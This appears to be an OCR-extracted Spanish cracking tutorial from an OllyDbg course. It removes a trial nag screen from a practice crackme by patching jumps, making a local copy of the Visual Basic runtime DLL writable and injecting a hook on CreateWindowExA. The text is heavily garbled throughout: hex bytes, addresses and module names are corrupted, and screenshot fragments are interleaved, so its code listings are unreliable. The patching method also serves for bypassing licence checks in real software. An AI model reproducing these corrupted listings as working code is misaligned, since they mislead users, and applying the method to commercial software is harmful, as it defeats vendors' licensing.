u04ur uE 
Ba4o07r7aF 
pu4a7710 


pala] 
El DB 09 
816024 04 3Bl SUB DWORD PTR SS: [ESP+4],3B 
ES 634600090 
. 816024 D4 431 SUB DWORD PTR SS: [ESP+41],43 
ES 64600090 
. 816024 04 471 SUB DWORD PTR SS: [ESP+4],47 
ES A9470000 
316024 04 371 SUB DWORD PTR SS: [ESP+4],37 
ES 0C480000 
. 816024 04 FFÍSUB DWORD PTR SS: LESP+41,0FFFF 
ES SF4BOB0O 
. 816024 04 3BI SUB DWORD PTR SS: [ESP+4],38 
¿vrE9 12400008 

(oa DE 98 


Ub Yu 


bu4br75S 


Veamos si sale la nag o si vuelve a otro JMP antes, demos RUN 


vu Ub Yu 


[la] DB 60 
816024 64 3B/ SUB DWORD PTR_SS: [ESP+4],3B 


E9 63460000 
E9 Có460000 
E9 A9470000 
E9 6C430000 
E9 38F4B0000 


316024 64 3B 
(68 12400000 


816C24 04 431 SUB DWORD PTR_SS: [ESP+4],43 


s16C24 604 471 SUB DWORD PTR_SS: [ESP+4],47 


816024 04 371 SUB DWORD PTR_SS: [ESP+4],37 


316024 64 FFI SUB DWORD PTR_ SS: [ESP+4],0FFFF 


SUB DWORD PTR_SS: [ESP+4],3B 
DB 60 


Ahora para en el último salto que va a 40c470, sin haber aparecido la nag. 


Demos RUN nuevamente 


* Crouz CrackMe-1 : ... 


Your 30 da trial lincese of CrouzCrackMe2 has 
expired, To enter registeration number, Click 
Register, 


Allí apareció la nag quiere decir que esta parte que se esta ejecutando que empezó en 40c470 es la 
responsable de la nag, apretemos el botón register. 


17 DE 89 
816024 4 3Bl SUB DWORD PTR SS: [ESP+4],3B 
ES 63460099 | JMP CrackMeA. 08408DS9 

816024 04 431 SUB DWORD PTR SS: [ESP+4], 43 


E9 C6460009_|JMP CrackMeA. B940BDFO 
316024 04 471 SUB DWORD PTR cios O 
41,3 


816024 04 371 SUB DWORD PTR SS: [ESP+ 
E9 60430008 | JMP CrackMeA. 0B4BBFSO 
3816024 04 FFÍ SUB DWORD PTR_ SS: [ESP+4],0FFFF 


E9 SF4B90000_ | JMP CrackMeA. 0B40C2E0 
316024 04 381 SUB DWORD PTR SS: [ESP+4],3B 


E9 12400008 | JMP CrackMeA. 06400478 
90 


DB 60 
115] DB 60 
Bl DB 61 
115] DB Bu 
mA Mo aa 


Al volver de la nag para en el segundo JMP que supuestamente ya iría al inicio del programa, así que 
podemos probar que ocurre si al JMP anterior que hace salir la nag lo desviamos a 40bdf0, que ocurre, 
salteara la nag?. 


4d il ca A la AE a > y Y $ y Y "PA 


au4077aF 577] DE 00 

Bn4B7 7161. 816024 64 3BI SUB DWORD PTR SS: [ESP+4],3B 
mamma Í:.. ES Esicoo0a | IMP CrackMeA. E24BBD89 
66457710 E 3816C24 64 431 SUB DWORD PTR SS: [ESP+4],43 
MECA |... ES Có960000_ | JUMP CrackMeA. 0040BDFO 


au4O772A [: 816024 04 471 SUB DWORD PTR SS: [ESP+4],47 
DARAS L.. ES 19470000 
“¡EEN [: 816024 04 371 SUB DWORD PTR SS: [ESP+4],37 
.v E9 BC480000_| JMP CrackMeA. 0040BFSO 
00407744 [: 316024 04 FFÍ SUB DWORD PTR SS: [ESP+4],0FFFF 
.v E9 SF4BB0Ba_ | JMP CrackMeA. BB460C2E0 
pB4B7751] . 816024 04 381 SUB DWORD PTR SS: [ESP+4],3B 
v E9 92460000 |JMP CrackMeA. 0040BDFAO 


bu4BrrsE [ala] DB Bu 
ab40775F [ala] DB 0 
10407760 Bi DB 61 

1040776 [512] DB 60 


Allí esta cambie el segundo salto que es el que va a la parte que hace aparecer la nag, por el tercero que 
debería arrancar el programa guardemos los cambios y veamos que pasa. 


DO 
ID 


Corramos el CrackmeA ya modificado fuera de OLLY 


* Crouz CrackMe-1 : ... 


System Code 
E4447234 


Registration 


Your 30 da trial lincese of CrouzCrackMe2 hay 
expired. To enter registeration number, Click 
Register. 


Vemos que nuestra modificación mejoro algo el problema, pero aun no esta terminado o sea, no sale la 
nag inicial que tenes que apretar el botón register para que aparezca la ventana para ingresar el serial 
falso, si no que aparecen las dos juntas, adelante la nag, tapando la otra, eso es un gran paso, porque si 
antes hacíamos a la nag invisible, la otra no aparecería al no haber apretado el botón register, ahora al 
menos solo nos queda hacer invisible la nag pues la otra ya apareció debajo y quedara sola, visible y 
funcional, al anular la que la tapa. 


Haciendo intentos con los demás JMPs no mejora la cosa, así que no queda otra que injertar. 

Ahora completemos la batalla, muchos crackers dicen que no corresponde modificar la dll de visual, eso 
podía ser cierto cuando hablamos de la que se encuentra en system32 y es usada por todos los programas, 
de forma que si la modificamos, puede afectar a otros programas, pero nosotros no haremos eso, si no que 
la copiaremos a la carpeta del crackme, de forma que esa solo será usada por el mismo, será una dll 
especial para el, los restantes programas de mi maquina continuaran usando, la que se encuentra en 
system32 por supuesto, o si tienen alguna en su propia carpeta pues usaran antes esa. 


La cuestión que copiamos la dll de visual que se llama. 


! Q eras ”" Y 5 ya ) Búsqueda (> Carpetas EM 


: Dirección E C:WWINDOWSisystem32 


Tareas del sistema a) a) a] 


msrd2x35... msrd2x40... msrd3x40... MSR 


(m Ocultar el contenido de esta 
carpeta 


2 Agregar o quitar programas a q a 
4? Buscar archivos o carpetas Ú 
mssap.dll— msscds3...  MSSCP.dll msst 


Tareas de archivo y carpeta Y a) a) 0) 


Otros sitios MSSTDFM... MSSTKP... mssurun.dat mss 


(D) WINDOWS 


(E Mis documentos j dl a) ( 


(E) Documentos compartidos 
Y miPc 
€ Vis sitios de red 


mstime.dll mstinitexÉ  mstisapi.dll ms 


A MSVBYM... MS 


» 


Detalles 


MSYBYM6O.DLL 
Extensión de la aplicación %) %) De a) 


Fecha de modificación: lunes 23 


msvco60.dll msvco70.dll msvco71.dll msv 


A la carpeta del programa 


MIS YBWIMI6BO.DLL 
'5.0,97,82 
“isual Basic Virtual Machine 


CrackMeA.exe 
Devilkins-Crouz 


CrackMea,bak 
Archivo Bak 
104 KB 


Allí esta jusnto al CrackmeA, esto puedo realizarlo porque la dll de visual no es una dll de sistema, en el 
caso que sea una dll de sistema, necesitare cambiar algunas cosas del programa para que acepte una dll en 
su Carpeta. 


O sea que cualquier programa que usa una cierta dll que no sea de sistema, primero busca en su carpeta y 
si no la halla, la busca en system32, en este caso al haber una en su propia carpeta usa esa, lo cual es muy 
bueno para nosotros jeje ya que nos permite modificarla sin que afecte a otros programas. 


Arranquemos el CrackmeA nuevamente en OLLYDBG, en este caso usamos un OLLYDBG común ya 
que para escribir injertos o líneas de código a veces los parcheados fallan. 


[c] File View Debug Plugins Options Window Help 


CESE en] vie] slo] e] + ujejmjtiwjnjc[/]k/B]R]... 


3 68 AB694000 PUSH CrackMeA. 0040690 
. ES FOFFFFFF 
- 0000 ADD EYTE PTR DS:LEAX],AL 


ADD BYTE PTR DS: [EAXJ,AL 
ADD BYTE PTR DS: [EAXJ. AL 


Verifiquemos en el botón E si esta usando la dll de su carpeta en vez de la de system32. 


yy [m]1]w]4] e] Jx)8)R]-Js] tl: 


33, AL 


¿1 mu 


2 mn E! HU 2 Mel 18 1918145] ESA 


dador 


Siz i 
015000 TTPIEZA EST E 2 
| 0BUBS3900 Tébbaeda | coscóns | 
770F0000| 0B0BSCODO| 710F1553 ES 5.1.2600.2180 
774RARAA! AA12NARA! 274FNA01 1 n1e: 5- 


E Que ments and Setti a i edo nEsosl itoriow27-INTRODUCCIOÓN AL CRACKING CON OLLYDBG PARTE 27sc0rackmesiCrackMeA. exe 
AWINDOWS sy stem32rsock sp 


Ci WINDOWS systemB2n0LEAUT32. d1 1 
1.2694.272% (20: MUTNAMMS su stema2na ea? 11 


Allí vemos que cargo la de la carpeta del crackme, en vez de la de system32 todos los cambios que 
hagamos en esta dll, solo afectaran al crackme y a ningún programa más de VB. 


Bueno ya tenemos la dll de visual ahora lo que nos falta es que podamos escribir en la sección code de la 
misma, o sea que tenga permiso de escritura, eso lo hacemos de la siguiente manera. 


Abrimos un OLLYDBG y vamos al menú OPEN 


Open 32-bit executable EaJES 


Buscar en: [e crackmes +] +“ E e Ely 


EXcrack Me.exe 
¿RP CrackMe2.exe 
¿RA CrackMe2a.exe 
¿A CrackMeA.exe 
¿A CrackMejeje.exe 
A killme.exe 


Arguments: | +] 


Vemos que viene predeterminado para abrir exes, pero también puede abrir dlls, si abrimos el menú 
desplegable elegimos 


Open 32-bit executable 


Buscar en: [5 crackmes +] e E Ely 


EXCrack Me.exe 
«A CrackMe2.exe 
¿ACrackMe2a.exe 
¿A CrackMeA.exe 
«PCrackMejeje.exe 
Y killme.exe 


Nombre: [CrackMea.exe 
Tipo: náá|— file P.exe) +] Cancelar 


[Executable file exe] A] 
Arguments: ca] 


Dynamic —link library (*.dll) con lo cual podremos abrir la dll de Visual. 


Buscaren: | ([) crackmes +] «eE 


MSYBWYIM6D.DLL 


Jombre: — [MSVBYMEO.DLL 
Tipo: Dynamic-link library [*. dll) 54 ] Cancelar 
Arguments: v ] 


PUSH EBX MSUBUMGO. <Modu leEntryPoint> 
PUSH EBP 


56 PUSH_ESI 
8B7424 14 MOV ESI, DWORD PTR SS: [ESP+14] 
25F6 ESI,ESI 


57 

Bs B1000090 
75 DE 

3800 M9AB1061 MOV _ECX, DWORD PTR DS: [661040007 
25c9 TEST _ECX, ECX 

BF34 BOBADZA 

8B7rc24 1C MOU EDI,DWORD PTR SS: [ESP+10] 
8B5C24 14 MOU EBX, DWORD PTR SS: [ESP+14] 
S3FE 61 CMP ESI,1 


74 2E 
S83FE 62 MP ESI,2 
S4 an 


Allí esta parado en su Entry Point. 


Bueno ahora debemos buscar el header que en este caso no estará ubicado en 400000 como normalmente, 
miremos la imagebase del archivo que es donde se inicia, apretando el botón E. 


PEE A a Ar LARUPESHEES 3) y) 99 PPP -) 7) Py y EcsAe! 


¿WINDOW d 
C: CUINDONS EyStenaóoles2. dí 
Ci: MIINDOWSssystem32smsvert. dll 


7C910000| 000B6000| 7C923156|ntdl l 5.1. 2600. 2180 ci MUINDOWS+system32ntdll. dll 


Allí en la columna base encontramos la imagebase de la dll que es 66000000 en mi caso, en sus maquinas 
puede variar. 


Vayamos en el dump a ver el header 


Enter expression to follow in ... [X] 


Cancel 


Disassemble 


Extra 


Comment 


Appearance >» 


Y cambiemos al modo Special- PE HEADER repitiendo el procedimiento que hicimos en el crackme, 
bajamos buscando la sección CODE. 


£<Modu LeEntryFOLnt > 


66000066 — |DD BOBBBOGA Delay Import Descriptor size = 0 
600000098 ¡DD BO0BBBAAa COM+ Runtime Header address = 4 
1als[s[s1515]515] uu s15151515]5]515) Import Address Table size = 0 
66B0000a ¡DD BOBBBAAA Reserved 


el FECDABBa [DD BBBACOFS VirtualSize = CDFS (52725.) 


Allí cambiamos a E0000020 para que tenga permiso de escritura. 


Modify dword ... [X] 


Hexadecimal lE 0000020 
Signed [536870880 


Unsigned [375809641 6 
+= 


MSUBUMEB. < 


ModuleEntruPoint> 
Comment 


Delay Import Descriptor size = 4 
COM+ Runtime Header address = O 
Import Address Table size = 0 


66000B066_ [DD 10BBBBBGA 
p6D606066 ¡DD 00000 
0606006 (DD 0000BBan 


60090000 |DD 0U0BBBAGA Reserved 

00998009  —|DD 004BBBA0a Reserved 

2E 74 65 7¡ASCII ”.text” SECTION 

DAB29F66 |DD BOBFBZDA VirtualSize = FB2DA (1028826. ) 
Bo100006 |DD 004B1GGB VirtualAddress = 10M 

BOCOBFAG |DD BMBFCOGA SizeOfRawData = FCOBA (1032192.) 
6a10000a ¡DD BOBB1GMa PointerToRawData = 1000 


5115151515151 00) 019 511515151515]=) 
D00900B0a lal51al: 101513) 
lls]a1:] (all) 


econo looae lena =08 
PointerToLineNumbers = MB 
NumberOfRe locations = 4 


FSCD6B06 BOBBCDFS 
GBANARFAR LAN ARAFNARA 


ceualsina = oa ARES: J 
VirtualAddress = 


Go to 


Hex 

Text 

Short 

Long 

Float 

Disassemble 
D 228 y Special 

DBCODFOO 

06100000 

(2 1:1:1:]:] 

DO00BB0O 

[1:1:]:] 

0660 


45 4E 47 ai ASCII SECTION 
FSCOG0ga BOBACDFS VirtualSize = CD 
A o 


AAAUALACIArA 


ENGINE” 
FSCDG00b |DD GBBACDFS VirtualSize = CDFS (527 
OBDOBFOD O00FDGOS VirtualAddress = FDG0B 
00DOB00B 20800880 SizeOfRawData = DB0B (E 
OBDOBFOD PainterToR am 
0000B00B 
0000BB0n 
0000 
0600 
20000060 á 
2E 64 61 Binary 
b2ñ51600 
09-00080 a Modify integer 
SO00DBnB Search for 
00000000 
0600 
0000 


Go to offset 


Hax 


Aquí no le cambiamos el nombre lo guardamos con el mismo nombre si no el crackme no lo cargara 


Una vez que ya tenemos ambos el crackme y la dll con posibilidad de escribir en ellos, antes de realizar el 
injerto, mostrare cual es la idea de lo que tenemos que hacer para que no aparezca la nag. 


Abramos en OLLYDBG el crackme que ya teníamos parcheado, para que aparezca la nag encima de la 
ventana del serial, y pongamos un BP en la api de creación de ventanas Bp Create WindowExA 


lemar ar marbris mein 


Ahora arranco el crackme 


CALL to Createlin A from MSUBUMES. SÉBMSEDA 
pt = WS_EX ¿> TOOLWINDON 


4] ThunderkTéMain"” 
A 


(518 


Width = 908 


A 

B 3] Height = =0 

al 3] hPar ent = NULL 

B 0006/] hienu = NUL LL 
Ñ 6 6600|| hInst = 66000000 
' 00000600 |L [Param = NULL 

19J515]5/5151515) 

BBES1FA4 

all 1a15 1512] 


Parara varias veces cuando va creando las diferentes ventanas y botones que tiene el crackme, lleguemos 
hasta cuando crea la nag. 


MSUBUMEO. 66BSASDS 


at n A from 
WS_EX_APPWINDOW 
C 


! = "Crouz CrackMe-1 : Setu 
Style = = IS OVERLAPPED! wWS_ CETPCHILORER: US SYSMENU1WS_CAPTION 
x=0 


| 
[Am 1> 


OS FFEFFFFC [-4.) 

Width = 167 (263.3 

Height = D6 (214.1) 

hParent = MBSEBETE (*CrouzCrackMe2”,class="ThunderRTéMain”) 
hMenu = NULL 

hInst = 66000000 


lParam = MULL 


farat 2 Sen 'LO 


Aquí esta la localizamos fácilmente por el nombre, allí en WindowName dice el titulo de la nag 
recordemos que era este 


JG PARTE xwuu” 


* Crouz CrackMe-1 : ... 


Bueno allí se esta creando la nag, si cambio el style o estilo del mismo, veamos que pasa intentando 
algunos valores veo que si pongo 40000000 


66B5ASDE|f CALL to CreatellindowExA_ from MSUBUMGM. 6685A8DS 
500040000 y = 1S_EX_APPWINDOW 
BBBBC2Sc ass = C28C 

Windowhame = "Crouz CrackMe-1 : Setup” 

a = 1S_OVERLAPPED:WS_CLIPCHILOREN:1S_SYSMENU!WS_CAPTION 
FFFFFFFC|] Y = Se FEFRRFC [-4.) 
60000107 ¡ 107 ro 
BBBBBBD6 
BBSED67E Parents = BOSEUGTE (["CrouzCrackMe2”,class="ThunderRTéMain”) 
(5J5J51515]51513] lenu = NULL 

56000000 : _66000900 

19JaJs 515151515] 'aram NULL 
BBES5388 
19J5J51515151515] 


S6B5ASDE E to CreatelindowExHA_ from MSUBUMGO. 66085A8DS 
A EX_APPWINDOW 


OOORAAS = "Crouz CrackMe-1 : Setup” 
E = WS_CHILD 


Y = FFFFFFFC (-4,) 

Width = 107 (263. ) 

Height = D6 (214.) 

hParent = BBSEBETE (*CrouzCrackMe2”,class="ThunderRTóMai 
hMenu = NULL 

hin=t = 66000999 

l[Param = NULL 


1 
Doo > aia 


aniScnco! aaaanana 
Cambia el estilo a WS CHILD ustedes pueden experimentar poniendo diferentes valores, a ver que pasa, 
ahora quito todos los BP y doy RUN. 


Registeration 


Registeration 


System Code : 
E4447234 


Registration Key : 


Cancel 


Vemos que sale sola la ventana de registro y la nag no aparece, el tema que injertar en VB es complejo si 
no cambias la dll, pero si podemos hacerlo y no afectamos ningún otro programa, porque vamos a boxear 
con las manos atadas, jeje. 


Bueno repitamos el procedimiento, hasta parar cuando crea la ventana en la api a injertar 
Create WindowExA 


Command HRACEACIII Mis 
Module CXWINDOW'SAsystem3215%5.DLL 


A 


Vemos que la api es llamada desde la dll de Visual Basic, que mejor que injertar allí, veamos de donde 
viene llamada, la primera línea del stack nos indica de donde se llamo a la api, vayamos allí. 


FFB6 84000601 PUSH DWORD PTR DS: [ESI+84] 
57 PUSH EDI 
PUSH DWORD PTR SS: LEBP-C] 


MOU EDI,EAX 
MOU EAX, DWORD PTR DS: [ESI+28] 
MOUV_EAX, DWORD PTR DS: [EAXI 
TEST BYTE PTR DS: CEAX+31,8 


Wind owName 
Class 


Pongamos un BP alli y quitemos el de la api. 


Ahora veamos cuando para, reiniciemos y demos RUN 


F35 DO0E6106í PUSH DWORD PTR DS: [6610E600] MSUBUMED. 11374 
Fe Bl PUSH DWORD PTR SS: [EBP+C] 
ES ALFSFFFF 
50 PUSH ERX hMe 
FF?S FC PUSH DWORD PTR SS: [EBP-4] h 
FF7S ES PUSH DWORD PTR SS: [EBP-18] 
FF7S EC PUSH DWORD PTR SS: [EBP-14] Width 
FF?S FS PUSH DWORD PTR SS: [EBP-8] 
53 PUSH EBX k 
FF7S 68 PUSH DWORD PTR SS: [EBP+8] 
FFB6 84000001 PUSH DWORD PTR DS: [ESI+84] 
. 57 PUSH EDI 
 FF?S F4 PUSH DWORD PTR SS: [EBP-C] E le 
+ FF1S ES140061 CALL_DWORD PTR DS: [<£USER32. Createllindor LCreatellindowExA 
. SBF3S MOU EDI,EAX 
8B46 28 mou EAX» DWORD PTR DS: [ESI+28] 
3800 MOU_EAX, DWORD PTR DS: [EAX] 
F6g4a 63 08 |TEST BYTE PTR DS: [EAX+31,8 
A MEOA SQCECCCÍ E MOLNDIUIMESA CEMEn71io 


A 


"Crouz Cr e-1 : Setup” 


DUERLAPPED ¿14S_CLIPCHILDREN ¡ls 


SMENU¡WS_CAPTION 


¡DO 


Vemos que la primera vez que para es cuando crea la nag, ya que las veces anteriores que paro en la api, 
fue llamado desde otras direcciones no de aquí. 


Lamentablemente no es la única vez que pasa por aquí, cuando crea la ventana de registro también lo hace 
desde aquí, así que debemos ser cuidadosos y hacer un injerto selectivo. 


Todo injerto se inicia con un JMP a una zona vacía donde se pueda escribir, si busco al final de la 
sección, veo que hay una zona vacía en 


En mi maquina esta allí en la suya estará al final de la seccion code, ven que hay muchos ceros, lo 


primero que haré será verificar si sirve. 


Hago click derecho — VIEW EXECUTABLE para ver la zona, la cual si aparece, me habilita para 


guardar los cambios en el exe. 


He view Lebug Plugins Options Window Help 


elative address 


ñ ] 


Backup 


Copy 
Binary 


Undo selection Alt+BkSp 
Assemble Space 


Label 

Comment A 
Breakpoint 

Hit trace 

Run trace 


New origin here 
Go to 
Follow in Dump 


CtrHGray * 


Search for 
Find references to 


Copy to executable 


Module 'CrackMe2" 
Module 'bdoe' 
Module 'XCOMM" 
Module 'sockspy' 
Module 'uwxthemne" 
Module 'OLEAUT32' 
Module 'COMCTL32' 
Module 'ole32' 
Module "VERSION" 
Module 'mswcrt' 
Module 'USER32" 
Module 'ADWAPIS2' 
Module 'RPCRT4' 
Module 'GDI32' 
Module 'SHLWAPI' 
Module 'MSWCR71' 
Module 'kernel32" 
Module 'ntdll' 
Module 'SHELL32" 


File C:¡Documents and ECMNPENES 
E a BWTE 


: 2], AL 
DS: CEAX], AL 
DS: [EAXJ], AL 
DS: CEAX], AL 
DS: [EAXJ, AL 
DS: [EAX], AL 
DS: [EAX], AL 
DS: [EAX], AL 
DS: [EAX], AL 


DS: [EAX], AL 
DS: [EAX], AL 


Veo que la zona aparece en el ejecutable. 

Bueno esto es importante al hacer un injerto, verificar si se puede guardar los cambios en la zona que 
elegimos porque muchas veces hay partes de una sección que son ceros, pero existen solamente en 
memoria, y no en el ejecutable, por lo cual no te deja guardar cambios en el exe (ya lo explicaremos 
mejor cuando veamos desempacado) 


MOU EDI,EAX 
MOU EAX, DWORD PTR DS: [ESI+28] 
MOV EAX, DWORD PTR DS: [EAXI 


Primero en donde estaba el call a la api hago un salto al injerto, 


a File View SS Pe ar Window Help 


MOU EDI,EAX 

MOU EAX, DWORD PTR DS: [ES1+28] 
E MOU_EAX, DWORD PTR DS: CEAX] 
F64o 63 08 |TEST BYTE PTR DS: [EAX+31,8 


Lo hago un salto indirecto porque cabe justo sin modificar la siguiente línea luego del call, que era un 
MOV EDI, EAX, siempre me tengo que fijar que al agregar código no rompa las instrucciones que 
siguen, y se mantenga la continuidad del programa, si sobrescribo algún byte de MOV EDI, EAX dará 
error allí al retornar del injerto. 


Hice un salto indirecto que toma la dirección donde saltara de 660fc400 que es una dirección un poco 
anterior a mi injerto donde guardo la dirección de inicio del mismo, podría haber hecho un salto directo, 
pero bueno, ambas posibilidades son validas (ya lo hice asi y me da fiaca cambiarlo si quieren puene 
poner JMP 660fc500, jeje) 


e 
'SBFC4BE Tr 


Como ven allí guardo la dirección de inicio del injerto, en resumidas cuentas cuando llegue al JMP saltara 
allí. 


4 


OFFSET MSUBUMGO. 113 


í 


Por supuesto en el stack aunque no estén marcados, están los parámetros de la api, allí se ve el nombre de 
la ventana. 


Debemos chequear primero que exista un nombre porque a veces llega aquí con el nombre puesto a cero, 
y si no chequeamos eso dará error. 


ASCII "Crouz CrackMe-1 : Setup” 


DODADO 
DO 
> paño Jud puño Judo pus pudo Judo 


1232727 11 


Si hago doble click allí en el stack veo que cambia 


D0B400Da 


Eso quiere decir que la primera linea es ESP, la segunda ESP+4 y así, vemos que la que nos interesa es 
ESP+8, movemos el valor ese a EAX. 


74 1H JE SHORT MSUBUMEO. 668FC522 
3138 o DWORD PTR DS: CEAX], 56F7243 
75 12 ae SHORT MSUBUMGO. 66BFCS22 


lo 


90 NOP 

074424 6C 001 MOU DWORD _PTR SS: [ESP+C], 40000000 
FF1S ES140061 CALL DWORD PTR DS: C<RUSER32. Createllindot USER32. CreatellindowExA 
E9 B1ESFSFF | JMP MSUBUMGO. 66BSASDE 
g0Ba ADD EYTE PTR DS: [EAXJ, AL 
ADD BYTE PTR DS: [EAXJI, AL 
ADD BYTE PTR DS: [EAXJI, AL 
CA MUITO MATA MM. rra mi 


ral 


Voy traceando el injerto para que entiendan como funciona, al ejecutar esa línea en EAX queda 


6 
a 
a 
B 


EIP 668FC504 MSUBUMGO. 660FCSO4 
CO ES 0023 32bit BFFFFFFFF) 


El puntero a la string del titulo, luego la siguiente línea testea si EAX es cero, lo cual ocurre en el caso de 
ventanas sin titulo. 


USER32. Create indowExA 


. DE 

DS: [EAXJI, AL 
ADD BYTE PTR DS: [EAX], AL 
ADD BYTE PTR DS: [EAXJI, AL 
4 BYTE PTR DS: [EAX],AL 


3864424 3 —— dd R SS: [ESP+8] 
ye4 18 pu e ocecorcos 
8138 43726F?I! CMP DWORD PTR_ DS: [EAX], 756F7243 
75 12 ES SHORT MSUBUM6N. 669FC522 


nónindn 
PA po pa pu 
n 


BYTE PTR' DS: TEAX], AL 
BYTE PTR DS: [EAXJ, AL 
BYTE PTR DS: [EAXJ, AL 
BYTE PTR DS: [EAXJ, AL 


Allí vemos que si EAX es cero no modifica nada y va directo al call a la api. 


Si EAX no es cero como en este caso continua, a la línea siguiente 


La] 44) | Al === 23) +=] MO E E E E 


MOU_EAX, DWORD PTR SS: [ESP+8] 
TEST EAX, EAX 

JE SHORT MSUBUMEO. 668FCS22 

CMP DWORD PTR_ DS: [EAX],756F7243 
5b SHORT MSUBUMEO. 669FC522 


168..».. 
Op. RH Op. 


Como en este caso la comparación es cierta, y es que va a crear la nag, no salta, si fuera cualquier otra 
ventana, saltaría directo a la api sin hacer cambios. 


Y movr 


O 


IA 


A 


dl 


3B4424 68 
3500 


v 74 18 
8138 A DWORD PTR DS: CEAX], 756F7243 
mE 12 


MOU_EAX, DWORD PTR SS: [ESP+8] 
TEST EAX,EAXx 
JE SHORT MSUBUMGO. 668FCS22 


Ta SHORT MSUBUMEO. 669FCS22 


JMP MSUBUMGO. SÉBSASDE 

ADD BYTE PTR DS: [EAX], AL 
ADD BYTE PTR DS: [EAXJ, AL 
ADD BYTE PTR DS: CEAXJ, AL 


ADD BYTE PTR DS: [EAX], AL 


lo 


90 NOP 
C74424 ac aa Mat DWORD _PTR_ SS: [ESP+C], 40000000 


sn E9 B1ESFSFF 
g00B 


Allí vemos que si no es igual, salta a la api sin cambiar nada, ahora si es igual o sea,es la ventana buscada 
o nag, continua y cambia el parámetro que esta en ESP+C que es el estilo de la ventana por 40000000 


EFrt++r+++r++ 


fr Afr AS AS AS AS AS AS ASA AS 


00040000 


DOBBC2SC 


00000006 
FFFFFFFC 
00000107 


00BBBaDE 
0072666 
15]51515]5151515] 

£600909a 
s1s15]5151515] 

00E65388 
551510]5151515] 


AscIl "Crouz CrackMe-1 : 


OFFSET MSUBUMEO. 11374 


Setup” 


DNA 


SOSA 


7 

? 
9 
9 
9 
9 
9 
9 
9 
90 
90 
90 
Cc? 
FF 
E9 
B 
B 
B 


DD 


4 CMP DWORD PTR 


MOU_EAX, DWORD PTR SS: [ESP+8] 
TEST EAX, EAX 

JE SHORT E 66BFCS22 

DS: [EAXJ, 756F7243 
AS SHORT MSUBUMEB. 668FC522 


NOP 
MOU DWORD _PTR SS: [ESP+C], 40000000 


CALL DWORD PTR DS: : L<RUSERS2, CreatelWindol USER32.CreatellindowExA 


JP TEIDE 6605ASDE 

ADD BYTE PTR DS: [EAXJ,AL 
ADD BYTE PTR DS: [EAXJ,AL 
ADD BYTE PTR DS: CEAX],AL 
ls PTR DS: [EAX], AL 


Llega a la api y allí vemos como quedaron los parámetros 


605040000 yle IS_EX_APPWINDON 
BOBBC28C 


ouz CrackMe-1 : Setup” 


FFFFFFFC (-4,) 
B000B107 Width = _ 197 (263.) 
BO0D0BBD6 | He ioht _D6 (214.) 
00720666 || hParent = A [*CrouzCrackMe2",class="ThunderRTéMain” 3 
B0B0BBBBa | hhenu = 
66000000 | hin=t = ESaBaDaD 
90000000 L ¡Param = MULL 
BBES5338 
15J5]5/515]515]5] 


DAA 


Vemos que como cambiamos ESP+C por 40000000 ahora el estilo es WS_CHILD como queríamos. 


La siguiente línea es el call a la api que no debe hacerse en forma directa sino al igual que como lo hace 
en la llamada original recordamos que era. 


3B46 28 MOU EAX; DWORD PTR EE. E 
2800 MOU_EAX, DWORD PTR D 
TEST BYTE PTR DS: CEAreS de “3 


F640 63 08 
5 29FEFFFF 
ES BE4EFFFF 
66:3D 0300 

BFSS 19FEFFFF 

8D45 94 

57 

FF1S 14140066 USER32. GetWindowRect 
8D45 94 LEA EAX, DWORD PTR SS: [EBP-6C] 
3D4E 58 LEA ECX, DWORD PTR DS: [ESI+58] 
50 PUSH EAX 


ES S119FFFF 
ES FOFDFFFF 


Sé 
ES_SC4FFFFF 
FF7S F4 


PUSH ESI 

PUSH DWORD PTR SS: [EBP-C] 
56 PUSH ESI 
ES 3FS2FFFF 
50 

8D45 Da 
FF7S 08 
50 


PUSH_EAX 

LEA EAX, DWORD jun SS: a 
FF1S 04130066 USER32. AdjustWindowRectEx 
E9 AFFEFFFF 

38D8 

ES BAFFFFFF 
E9 BSFFFFFF 


YYD2025E (USERS2. CreatellindowExA) 


Allí vemos que es un CALL indirecto, que lee el valor correcto de la api de 660014e8, por lo tanto 
hacemos lo mismo escribimos. 


CALL [660014e8] 


Y OLLY cambiara y colocara el nombre de la api donde saltara, pero es importante respetar siempre que 
sea un call indirecto similar al original, para que funcione en cualquier maquina, ya veremos eso con mas 
profundidad en la parte de desempacados e IATs. 


90 NOP 
074424 0C BO MOU DWORD _PTR SS: [ESP+C], 400090008 
FF1S ES140061 CALL DWORD PTR DS: [<£USERS2. Createllindo! USER32.CreatellindowExA 
77 B1ESFSFF | JMP MSUBUMGO. 660SASDE 
lla lalz] ADD BYTE PTR DS: [EAXJ,AL 


lla lalz] ADD BYTE PTR DS: [EAXJ,AL 
lla lslz] ADD BYTE PTR DS: [EAXJ,AL 
(ala 1s12] ADD BYTE PTR DS: [EAXJ,AL 
[ls] DB Bu 
1515] DE 40 


EDLEAX. 


rusn Eu 
PUSH_DWORD_PTR_SS: [EBP-C] 
MSUBUMGO. SÉBFCSGO 


MOU EDI,EAX 
MOU EAX, DWORD PTR DS: [ESI+28] 
MOU_EAX, DWORD PTR DS: [EAX] 


8B00 
Feo 63 us TEST BYTE PTR DS: [EAX+3],8 
MFSd PQFEFFEÍL E MQURUIMEA ELARO7IA 


Donde continúa ejecutando el programa 


Como vemos lo que he hecho es reemplazar el call a una api, por una rutina propia, que para cualquier 
ventana que no sea la nag funcione como siempre, solamente una vez que chequea que es la nag a matar, 
allí le cambia el estilo para que no se vea. 


Guardemos todos estos cambios y probemos. 


Registeration 


Registeration 


System Code ; 
1E4447234 


Registration Key : 


| 


Vemos que con el crackme parcheado y la dll parcheada elimine la nag perfectamente y funciona, 
probemos el serial correcto anterior que averiguamos. 


Lo tipeo en la ventana 


Registeration [Xx] 
Registeration 


System Code : 
E4447234 


Registration Key : 
4887649] 


Apreto OK 


Okey, If You have Programmed a Keygen for Crouz-CrackMe2 Please E-Mail It's "SourceCode" to : 
amoxi.devilkintgmail.corm 


*SourceCode Can be in this Languages : Basic, C, Perl, Java, Delphi, ASM and Other Related 
Languages 
*And do not forget to Write your Crouz-Username 


Vemos que funciona perfectamente, el tema es no ser mojigatos y injertar probar y hacer lo que sea mas 
sencillo, que soluciones hay muchas, pero si podemos hacerla que funcione y no perjudique otro 
programa, estaríamos jugando casi con las mismas herramientas que el programador (ellos si perjudican 
otros programas a veces, nosotros no) pero estaríamos mas a mano. 


Me gustaría que para practicar vean si pueden quitar la nag del otro crackme que les di en la parte 
anterior, pero esta vez sin el método del 4c, si no usando este método de parchear el crackme y la dll, a 
ver si pueden con el. 


Hasta la parte 29 
Ricardo Narvaja 
24 de enero de 2006 


